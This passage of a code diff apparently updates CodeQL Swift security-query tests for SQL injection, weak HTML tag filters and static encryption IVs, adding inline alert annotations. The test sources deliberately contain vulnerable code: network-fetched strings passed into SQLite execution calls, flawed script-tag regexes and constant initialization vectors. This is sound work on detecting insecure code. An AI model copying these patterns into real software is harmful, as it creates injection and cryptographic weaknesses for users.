String.init(contentsOf:) | user-provided value | -| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref index eaf19a94546e..654631d8a094 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref @@ -1 +1,2 @@ -queries/Security/CWE-089/SqlInjection.ql \ No newline at end of file +query: queries/Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-089/other.swift b/swift/ql/test/query-tests/Security/CWE-089/other.swift index 52cafbb15456..76edd815e14d 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/other.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/other.swift @@ -43,18 +43,18 @@ class MyDatabase { // --- tests --- func test_heuristic(db: MyDatabase) throws { - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source _ = MyDatabase() // GOOD _ = MyDatabase(sql: "some_fixed_sql") // GOOD - _ = MyDatabase(sql: remoteString) // BAD + _ = MyDatabase(sql: remoteString) // BAD // $ Alert - db.execute1(remoteString) // BAD - db.execute2(remoteString) // BAD - db.execute3(NSString(string: remoteString)) // BAD - db.execute4(remoteString as! Sql) // BAD + db.execute1(remoteString) // BAD // $ Alert + db.execute2(remoteString) // BAD // $ Alert + db.execute3(NSString(string: remoteString)) // BAD // $ Alert + db.execute4(remoteString as! Sql) // BAD // $ Alert - db.query(sql: remoteString) // BAD + db.query(sql: remoteString) // BAD // $ Alert db.query(sqlLiteral: remoteString) // BAD [NOT DETECTED] db.query(sqlStatement: remoteString) // BAD [NOT DETECTED] db.query(sqliteStatement: remoteString) // BAD [NOT DETECTED] diff --git a/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift b/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift index 8498d89d68da..b0e53f15567a 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift @@ -119,7 +119,7 @@ func sqlite3_finalize( func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) { let localString = "user" - let remoteString = try! String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try! String(contentsOf: URL(string: "http://example.com/")!) // $ Source let remoteNumber = Int(remoteString) ?? 0 let unsafeQuery1 = remoteString @@ -130,9 +130,9 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) // --- exec --- - let result1 = sqlite3_exec(db, unsafeQuery1, nil, nil, nil) // BAD - let result2 = sqlite3_exec(db, unsafeQuery2, nil, nil, nil) // BAD - let result3 = sqlite3_exec(db, unsafeQuery3, nil, nil, nil) // BAD + let result1 = sqlite3_exec(db, unsafeQuery1, nil, nil, nil) // BAD // $ Alert + let result2 = sqlite3_exec(db, unsafeQuery2, nil, nil, nil) // BAD // $ Alert + let result3 = sqlite3_exec(db, unsafeQuery3, nil, nil, nil) // BAD // $ Alert let result4 = sqlite3_exec(db, safeQuery1, nil, nil, nil) // GOOD let result5 = sqlite3_exec(db, safeQuery2, nil, nil, nil) // GOOD @@ -142,7 +142,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt1: OpaquePointer? - if (sqlite3_prepare(db, unsafeQuery3, -1, &stmt1, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare(db, unsafeQuery3, -1, &stmt1, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt1) // ... } @@ -172,7 +172,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt4: OpaquePointer? - if (sqlite3_prepare_v2(db, unsafeQuery3, -1, &stmt4, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare_v2(db, unsafeQuery3, -1, &stmt4, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt4) // ... } @@ -180,7 +180,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt5: OpaquePointer? - if (sqlite3_prepare_v3(db, unsafeQuery3, -1, 0, &stmt5, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare_v3(db, unsafeQuery3, -1, 0, &stmt5, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt5) // ... } @@ -191,7 +191,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt6: OpaquePointer? - if (sqlite3_prepare16(db, buffer, Int32(data.count), &stmt6, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare16(db, buffer, Int32(data.count), &stmt6, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt6) // ... } @@ -199,7 +199,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt7: OpaquePointer? - if (sqlite3_prepare16_v2(db, buffer, Int32(data.count), &stmt7, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare16_v2(db, buffer, Int32(data.count), &stmt7, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt7) // ... } @@ -207,7 +207,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt8: OpaquePointer? - if (sqlite3_prepare16_v3(db, buffer, Int32(data.count), 0, &stmt8, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare16_v3(db, buffer, Int32(data.count), 0, &stmt8, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt8) // ... } diff --git a/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref b/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref index 8186dfa236f1..67e973ba99e6 100644 --- a/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref +++ b/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref @@ -1 +1,2 @@ -queries/Security/CWE-116/BadTagFilter.ql \ No newline at end of file +query: queries/Security/CWE-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-116/test.swift b/swift/ql/test/query-tests/Security/CWE-116/test.swift index e2e88135dd6f..be6cbc0dcdd2 100644 --- a/swift/ql/test/query-tests/Security/CWE-116/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-116/test.swift @@ -76,18 +76,18 @@ func myRegexpVariantsTests(myUrl: URL) throws { let tainted = String(contentsOf: myUrl) // tainted // BAD - doesn't match newlines or `` - let re1 = try Regex(#".*?<\/script>"#).ignoresCase(true) + let re1 = try Regex(#".*?<\/script>"#).ignoresCase(true) // $ Alert _ = try re1.firstMatch(in: tainted) // BAD - doesn't match `` - let re2a = try Regex(#"(?is).*?<\/script>"#) + let re2a = try Regex(#"(?is).*?<\/script>"#) // $ Alert _ = try re2a.firstMatch(in: tainted) // BAD - doesn't match `` - let re2b = try Regex(#".*?<\/script>"#).ignoresCase(true).dotMatchesNewlines(true) + let re2b = try Regex(#".*?<\/script>"#).ignoresCase(true).dotMatchesNewlines(true) // $ Alert _ = try re2b.firstMatch(in: tainted) // BAD - doesn't match `` let options2c: NSRegularExpression.Options = [.caseInsensitive, .dotMatchesLineSeparators] - let ns2c = try NSRegularExpression(pattern: #".*?<\/script>"#, options: options2c) + let ns2c = try NSRegularExpression(pattern: #".*?<\/script>"#, options: options2c) // $ Alert _ = ns2c.firstMatch(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // GOOD @@ -110,71 +110,71 @@ func myRegexpVariantsTests(myUrl: URL) throws { _ = try re5.firstMatch(in: tainted) // BAD, does not match newlines - let re6 = try Regex(#")|([^\/\s>]+)[\S\s]*?>"#) + let re16 = try Regex(#"<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"#) // $ Alert _ = try re16.firstMatch(in: tainted) // BAD - doesn't match comments with the right capture groups - let ns16 = try NSRegularExpression(pattern: #"<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"#) + let ns16 = try NSRegularExpression(pattern: #"<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"#) // $ Alert _ = ns16.firstMatch(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let re17 = try Regex(#"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#) + let re17 = try Regex(#"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#) // $ Alert _ = try re17.firstMatch(in: tainted) // BAD - capture groups - let ns17 = try NSRegularExpression(pattern: #"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#, options: .caseInsensitive) + let ns17 = try NSRegularExpression(pattern: #"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#, options: .caseInsensitive) // $ Alert _ = ns17.firstMatch(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - too strict matching on the end tag - let ns2_1 = try NSRegularExpression(pattern: #"]*>([\s\S]*?)<\/script>"#, options: .caseInsensitive) + let ns2_1 = try NSRegularExpression(pattern: #"]*>([\s\S]*?)<\/script>"#, options: .caseInsensitive) // $ Alert _ = ns2_1.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let ns2_2 = try NSRegularExpression(pattern: #"(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)"#, options: .caseInsensitive) + let ns2_2 = try NSRegularExpression(pattern: #"(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)"#, options: .caseInsensitive) // $ Alert _ = ns2_2.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let ns2_3 = try NSRegularExpression(pattern: #"<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"#) + let ns2_3 = try NSRegularExpression(pattern: #"<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"#) // $ Alert _ = ns2_3.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let ns2_4 = try NSRegularExpression(pattern: #"|<([^>]*?)>"#) + let ns2_4 = try NSRegularExpression(pattern: #"|<([^>]*?)>"#) // $ Alert _ = ns2_4.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // GOOD - it's used with the ignorecase flag @@ -222,7 +222,7 @@ func myRegexpVariantsTests(myUrl: URL) throws { _ = ns2_5.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - doesn't match --!> - let ns2_6 = try NSRegularExpression(pattern: #"-->"#) + let ns2_6 = try NSRegularExpression(pattern: #"-->"#) // $ Alert _ = ns2_6.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected index 02fdbe6a6a48..688f7cb4e987 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected +++ b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected @@ -1,3 +1,33 @@ +#select +| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | edges | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:68:104:68:104 | myConstIV1 | provenance | | | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:77:125:77:125 | myConstIV1 | provenance | | @@ -87,33 +117,3 @@ nodes | test.swift:167:22:167:22 | iv | semmle.label | iv | | test.swift:168:22:168:22 | iv | semmle.label | iv | subpaths -#select -| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for 